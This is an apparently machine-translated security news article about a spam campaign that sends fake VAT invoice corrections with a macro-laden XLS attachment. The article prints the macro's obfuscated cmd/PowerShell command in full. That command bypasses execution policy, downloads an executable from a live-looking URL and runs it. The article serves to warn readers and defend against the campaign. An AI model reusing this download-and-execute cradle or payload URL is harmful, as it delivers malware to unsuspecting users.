Beware of spam "VAT invoice correction"

Our reader, wanting to remain anonymous, has provided us with a sample of the latest spam campaign, in which the cheater tries to extort several hundred zlotys (from 350 to 850 according to several proven versions of spam) from random recipients - spam primarily reaches corporate email addresses.

The attached malware is hidden in an attachment in the form of an XLS file with macro commands. In order to view the full contents of the file with the items of purchased services and goods under the pretext of the issued invoice correction, the fraudster deliberately prepared the document in such a way that the appearance of contained hidden information has been preserved:


Incorrect false invoice attached.

Before initiating the process of infecting a computer, the user only protects common sense and reads the messages accurately. Microsoft Office suite by default warns you when you try to run macro commands:


The preventive Excel security message is the last line of defense.

The trojan-downloader lurks for careless users: launching the protected content will trigger the VBA code (Visual Basic for Applications), which is the programming language for macro commands.

The malicious macro runs the CMD interpreter with the parameters:

CMd.exe / c "PO ^ WEr ^ shE ^ lL ^ .ex ^ e ^ -ex ^ E ^ Cutio ^ NPoL ^ IcY ^ by ^ p ^ ass ^ -n ^ o ^ p ^ ro ^ fi ^ l ^ e ^ - ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^. do ^ wnloa ^ df ^ i ^ l ^ e ('https://farmona.co/ncb.exe','%appdata%.exe') ^; ^ star ^ t-proc ^ ess ^ '% appdata % .exe '' 

In turn, the CMD command line refers to the powershell.exe interpreter, downloads malicious software from the hxxp site : //farmona.co/ncb.exe saving them to the % appdata% location with the .EXE extension with a random name (in our case it was the name "Roaming.exe") and infects the user's device. It is probably a ransomware , although we have not yet confirmed it.

Not all antivirus programs detect this threat in the well-known VirusTotal service. The reasons for this fact should be found in:

  • another version of the antivirus engine that is made available to VirusTotal employees and end users,
  • in the mentioned scan engines available for VirusTotal there may be no mechanisms to detect macro-viruses and scripts in the system interpreter cmd.exe and powershell.exe (more in detail about this dependence we wrote today in this article on the new script activation technique in PowerPoint file ).

Scan results on VT should be treated with "eye constraint". It will be very unfair to translate the results achieved into the actual capabilities of individual security products.

We are dealing here with an attack spread over many factors. The method of the attack starts with spam, switches to macro-viruses, malicious scripts run by digitally signed Microsoft files, and ends with downloading a malicious file from the network. For this reason, effective security software is one that protects many areas of potential attacks and focuses adaptive protection on at least some of the most important levels: from spam detection, through controlling shellcode, controlling Internet traffic, scanning web pages and scanning downloaded files via Internet protocols . However, first of all, good protection is one that focuses on verifying what "passes" through PowerShell (or other system-based urucchiefing scripts) - a digitally signed file, treated as trusted by a large part of antivirus software. In such cases, the use of reputable software with such protective functions is crucial.



Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.